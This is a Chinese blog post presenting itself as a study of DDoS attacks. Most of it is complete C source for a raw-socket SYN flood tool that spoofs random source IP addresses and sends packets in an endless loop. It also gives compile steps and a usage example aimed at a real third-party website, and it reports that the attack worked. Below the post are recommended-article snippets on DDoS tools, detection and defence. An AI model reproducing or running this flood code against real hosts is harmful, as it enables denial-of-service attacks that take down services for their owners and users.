DDOS攻击实现及学习

最新推荐文章于 2025-03-27 11:12:09 发布
最新推荐文章于 2025-03-27 11:12:09 发布
阅读量1.5w 收藏 95
点赞数 15
分类专栏: 网络安全 文章标签: ddos ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a326713510/article/details/52713742
版权

DDOS攻击实现及学习

目录:

文章目录

1、背景:

  • 学习并实现DDOS攻击,深入了解TCP/IP,UDP/IP的底层结构。

2、实验环境:

  • Ubuntu 15.10
  • c/c++

3、源码:

ddos.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <error.h>
#include<netdb.h>

//ip首部长度
#define IP_HEADER_LEN sizeof(struct ip)
//tcp首部长度
#define TCP_HEADER_LEN sizeof(struct tcphdr)
//ip首部+tcp首部长度
#define IP_TCP_HEADER_LEN IP_HEADER_LEN+TCP_HEADER_LEN
//本地端口
#define LOCALPORT 8888

void err_exit(const char *err_msg) {
	perror(err_msg);
	exit(1);
}

//填充ip首部
struct ip *fill_ip_header(int ip_packet_len) {
	struct ip *ip_header;
	ip_header = (struct ip *) malloc(IP_HEADER_LEN);
	ip_header->ip_v = IPVERSION;
	ip_header->ip_hl = sizeof(struct ip) / 4;
	ip_header->ip_tos = 0;
	ip_header->ip_len = htons(ip_packet_len);
	ip_header->ip_id = 0;
	ip_header->ip_off = 0;
	ip_header->ip_ttl = MAXTTL;
	ip_header->ip_p = IPPROTO_TCP;
	ip_header->ip_sum = 0;
	return ip_header;
}

//填充tcp首部
struct tcphdr *fill_tcp_header(int dst_port) {
	struct tcphdr *tcp_header;
	tcp_header = (struct tcphdr *) malloc(TCP_HEADER_LEN);
	tcp_header->source = htons(LOCALPORT);
	tcp_header->dest = htons(dst_port);
	tcp_header->doff = 5;
	tcp_header->syn = 1;
	tcp_header->seq = random();
	tcp_header->ack_seq = 0;
	tcp_header->check = 0;
	return tcp_header;
}

//发送ip_tcp报文
void ip_tcp_send(const char *dst_ip, int dst_port, int sockfd) {
	struct ip *ip_header;
	struct tcphdr *tcp_header;
	struct sockaddr_in dst_addr;
	struct hostent *host;
	socklen_t sock_addrlen = sizeof(struct sockaddr_in);

	int ip_packet_len = IP_TCP_HEADER_LEN;
	char buf[ip_packet_len];
	host=gethostbyname(dst_ip);

	bzero(&dst_addr, sock_addrlen);
	dst_addr.sin_family = PF_INET;
	dst_addr.sin_addr= *(struct in_addr *)(host->h_addr_list[0]); ;
	dst_addr.sin_port = htons(dst_port);

//	ip首部
	ip_header = fill_ip_header(ip_packet_len);
	ip_header->ip_dst=dst_addr.sin_addr;
//	tcp首部
	tcp_header = fill_tcp_header(dst_port);

	bzero(buf, ip_packet_len);
	memcpy(buf, ip_header, IP_HEADER_LEN);
	memcpy(buf + IP_HEADER_LEN, tcp_header, TCP_HEADER_LEN);

	printf("DDOS attack start..........\n");
//	发送报文
	while (1) {
		ip_header->ip_src.s_addr = random();
		sendto(sockfd, buf, ip_packet_len, 0, (struct sockaddr *) &dst_addr,
				sock_addrlen);
	}
}

int main(int argc, const char *argv[]) {
	if(argc < 2)
	{
		printf("usage:%s hostname/ip dst_port [src_port]", argv[0]);
		exit(1);
	}
	int sockfd, on = 1;
	//	创建tcp原始套接字
	if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
		err_exit("socket()");
	else
		printf("socket create success!!!\n");
	//	开启IP_HDRINCL,自定义IP首部
	if (setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1)
		err_exit("setsockopt()");
	else
		printf("set socket option success\n");
	printf("starting attack..............\n");
	setuid(getpid());
	ip_tcp_send(argv[1], atoi(argv[2]), sockfd);
	close(sockfd);
	return 0;
}

4、使用方法:

1、编译链接源码:gcc -W -Wall ddos.c -o ddos
2、攻击:sudo ./ddos www.hwadee.com 80

5、实验效果:

1、正常时的访问时间
这里写图片描述
2、DDOS攻击中的访问时间
这里写图片描述

6、实验总结:

开始是参考IP/TCP发送程序写的,但是发现没效,目前只能认为原因是每次发送都新建一个socket。后来改成同一个socket,通过每次循环改变源IP再发送就有效了。具体原因尚未清楚,有待以后详细研究。
DDOS会发送大量数据包,大量数据包在网络链路上,可能会引起网络拥塞。网络拥塞也可以引起无法访问或访问时间过长的问题。但是经过试验证明,网络拥塞只是微乎其微的影响,完全可以忽略不计。
总体来说,DDOS攻击还是成功的,有时间再深究socket和IP/TCP的东西了。

基于Node.js实现DDoS攻击程序
CyberBladeX的博客
09-29 269
然而,DDoS攻击是非法的,且违反了网络安全规范和法律法规。在这篇文章中,我将介绍如何使用Node.js编写一个简单的DDoS攻击程序。在实际的DDoS攻击中,攻击者通常会使用更多的技术手段来增加攻击效果,如使用分布式攻击方式、伪造源IP地址、使用多个攻击向量等。在开始之前,请注意DDoS攻击是非法的,违反了网络安全规范和法律法规。如果你对网络安全感兴趣,请考虑合法的学习和研究活动,以帮助保护网络的安全和稳定。请注意,以上代码只是一个简单的示例,实际的DDoS攻击程序可能会更加复杂和危险。
DDos 攻击 学习
三米学习笔记杂货铺
12-22 3386
本帖整合了攻防版块相关DDOS的帖子,方便午饭们学习!DDOS介绍 DDOS攻击防御简析 http://bbs.51cto.com/thread-69826-1.html 一起探讨DOS和DDOS http://bbs.51cto.com/thread-629805-1.html  【安全知识普及】什么是DDOS攻击? http://bbs.51cto.com/thread
全网最全系统学习爬虫教程,用爬虫进行数据分析(bs4,xpath,正则表达式)
m0_59164304的博客
05-25 2464
1.bs4解析基础 2.bs4案例 3.xpath解析基础 4.xpath解析案例-4k图片解析爬取 5.xpath解析案例-58二手房 6.xpath解析案例-爬取站长素材中免费简历模板 7.xpath解析案例-全国城市名称爬取 8.正则解析 9.正则解析-分页爬取 10.爬取图片 1.bs4解析基础 from bs4 import BeautifulSoup fp = open('第三章 数据分析/text.html','r',encoding='utf-8') soup = BeautifulSo
DDOS攻击实验
2301_77977773的博客
06-18 1507
1.2.
一文秒懂什么是DDoS攻击(非常详细),零基础入门到精通,看这一篇就够了
kjuhfkicf154的博客
03-27 1248
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
Termux实现ddos攻击
2302_79706076的博客
04-20 6645
1.打开Termux,输入apt install figlet。2.输入apt install git。3.将github上的项目克隆到本地。
学习手册:浅析DDoS攻击及防御
fengling59的专栏
01-10 714
随着全球互联网业务和云计算的发展热潮,可以预见到,针对云数据中心的DDoS攻击频率还会大幅度增长,攻击手段也会更加复杂。本文从概念、发展、攻击方式、攻击工具以及防御等各方面全面阐述了DDoS,是小编在学习过程中的心得和浅析。
DDoS攻击学习笔记
虫写的专栏
01-04 1076
DDoS Attack出现在1999年,中文名是分布式拒绝服务攻击
DDOS学习笔记(《破坏之王-DDOS攻击与防范深度剖析》)
weixin_33758863的博客
05-23 295
最近花了点时间把《破坏之王-DDOS攻击与防范深度剖析》看了一遍,坦白来说,这本书比较浅显,可以说是入门书,当然对于我这种对DDOS一知半解的人来说,也是一本不错的书,起码我学到了一些东西。 DDOS是分布式拒绝服务(Distributed Denial of Service, DDOS)的简写,从名字可以看出,其攻击是分布式的,即多台(可能上万台,甚至更多)电脑同时...
DDoS攻击方式的学习与了解
热门推荐
ATree的博客
05-02 2万+
之前并未接触过DDoS,也不是很了解这种攻击方式到底分了多少种,近日分析一个样本,发现是DDoS攻击工具,于是要求我去分析下使用的是什么攻击方式,我也很疑惑,他们讲的一些攻击方式我也没有听说过,也不了解,于是就赶紧趁机会百度,谷歌学习了一下,最后在知乎上找到了一些比较详细的说明吧,是知道创宇的官方公众号写的,我觉得他解释和说明的都很不错,于是就打算拿来学习一下,下次就不用找相关的资料那么麻烦了。作...
关于DDoS攻击学习
zzhzhua的专栏
09-26 2134
关于DDoS攻击目前网络安全中常见的攻击主要有以下几种,其所占比例如表:由此我们有必要认识一下站攻击比例最高的拒绝服务攻击:DoS攻击。目前拒绝服务攻击有主要以分布式的形式,即分布式拒绝服务攻击(DDoS攻击).下面我们主要来认识一下DDoS攻击。    在我们开始了解DDoS攻击之前,先来了解一下DoS攻击,即拒绝服务攻击(Denial of service):DoS攻击是指
SDN下基于深度学习混合模型的DDoS攻击检测与防御.pdf
08-19
文章中提到的研究,即基于深度学习混合模型的DDoS攻击检测方法——DCNN-DSAE,该方法结合了深度卷积神经网络(DCNN)和深度自编码器(DSAE),利用深度学习的自适应学习和非线性特征提取能力,来实现DDoS攻击的高...
基于改进非洲秃鹰优化算法的DDoS攻击检测方法及其Matlab实现
最新发布
04-08
使用场景及目标:适用于需要高效检测DDoS攻击的安全系统开发,旨在提高DDoS攻击检测的准确性、效率和鲁棒性。 其他说明:文中提到的一些关键技术细节如Sin-Cos传递函数、动态惯性因子、GFRNN分类器等,对于理解和...
基于DDoS攻击的电商企业网络安全模型的设计与实现.pdf
07-09
针对文档“基于DDoS攻击的电商企业网络安全模型的设计与实现.pdf”提供的内容,我们可以提炼出以下知识点: 1. 电子商务网络安全问题:文档指出电子商务中网络安全问题日益凸显,成为电商企业长远发展的重大难题。...
基于机器学习DDoS 攻击验证.pdf
09-24
"基于机器学习DDoS攻击验证.pdf" 机器学习DDoS攻击验证中的应用是一个热门的研究方向。本文旨在通过机器学习算法来检测和防止DDoS攻击,提高网络安全性。下面是本文中涉及到的机器学习知识点: 1. 数据预处理...
基于CNN对DDoS攻击检测实现
2301_79580906的博客
12-15 1560
CNN能够自动提取网络流量中的特征,并通过深度学习模型准确分类流量是否属于DDoS攻击。通过该方法,可以提高DDoS攻击的检测效率和准确率,并为网络安全防护提供更强大的技术支持。在实际应用中,可能需要根据不同的网络环境和流量特点对模型进行进一步的优化和调参,以提高模型的实时性和鲁棒性。
学习手册:DDoS攻击方式及防御手段
weixin_33738578的博客
07-05 386
现如今,信息技术的发展为人们带来了诸多便利,无论是个人社交行为,还是商业活动都开始离不开网络了。但是网际空间带来了机遇的同时,也带来了威胁,其中DDoS就是最具破坏力的攻击,通过这些年的不断发展,它已经成为不同组织和个人的攻击,用于网络中的勒索、报复,甚至网络战争。   先聊聊DDoS的概念和发展 在说发展之前,咱先得对分布式拒绝服务(DDoS)的基本...
DDOS 攻击的防范教程
JavaGuide
07-01 6309
作者: 阮一峰 日期: 2018年6月26日 原文地址:http://www.ruanyifeng.com/blog/2018/06/ddos.html 一个多月前,我的个人网站遭受 DDOS 攻击,下线了50多个小时。这篇文章就来谈谈,如何应对这种攻击。 需要说明的是,我对 DDOS 并不精通,从没想过自己会成为攻击目标。攻击发生以后,很多素昧平生的朋友提供了各种帮助和建议,让我学到了很...
结合Socket实现DDoS攻击
weixin_33840661的博客
03-03 2644
一、实验说明 1. 实验介绍 通过上一节实验的SYN泛洪攻击结合Socket实现DDoS攻击。 2. 开发环境 Ubuntu Linux Python 3.x版本 3. 知识点 本次实验将涉及以下知识点: argparse 命令解析 socket的基本用法 4. 效果图 二、理论知识 1. 实现思路 由于上节实验我们已经实现了SYN泛洪攻击,而DDoS则是多台主机一起发起攻击,我们只需...
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值